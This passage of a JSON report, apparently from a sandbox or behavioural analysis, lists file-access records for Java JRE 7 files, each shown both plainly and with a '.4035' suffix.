"hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nouakchott.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nouakchott", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ouagadougou.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ouagadougou", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\porto-novo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\porto-novo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\sao_tome.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\sao_tome", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tripoli.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tripoli", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tunis.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tunis", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\windhoek.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\windhoek", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\blacklist.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\blacklist", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\cacerts.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\cacerts", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.policy.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.policy", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.security.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.security", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\javafx.policy.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\javafx.policy", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\javaws.policy.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\javaws.policy", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.access.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.access", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.password.template.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.password.template", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\management.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\management.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\snmp.acl.template.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\snmp.acl.template", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\default.jfc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\default.jfc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\profile.jfc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\profile.jfc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\cursors.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\cursors.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\invalid32x32.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copydrop32x32.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copydrop32x32.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copynodrop32x32.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copynodrop32x32.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linkdrop32x32.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linkdrop32x32.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linknodrop32x32.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linknodrop32x32.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movedrop32x32.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movedrop32x32.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movenodrop32x32.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movenodrop32x32.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\i386\\jvm.cfg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\i386\\jvm.cfg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemibold.ttf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemibold.ttf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemiitalic.ttf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemiitalic.ttf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightitalic.ttf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightitalic.ttf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightregular.ttf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightregular.ttf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansdemibold.ttf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansdemibold.ttf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansregular.ttf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansregular.ttf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterbold.ttf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterbold.ttf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterregular.ttf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterregular.ttf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\meta-index.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\meta-index", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_de.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_de.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_es.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_es.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_fr.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_fr.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_it.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_it.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ja.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ja.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ko.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ko.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties.4035", "hashes": [], "norm_filename": "c:\\program files 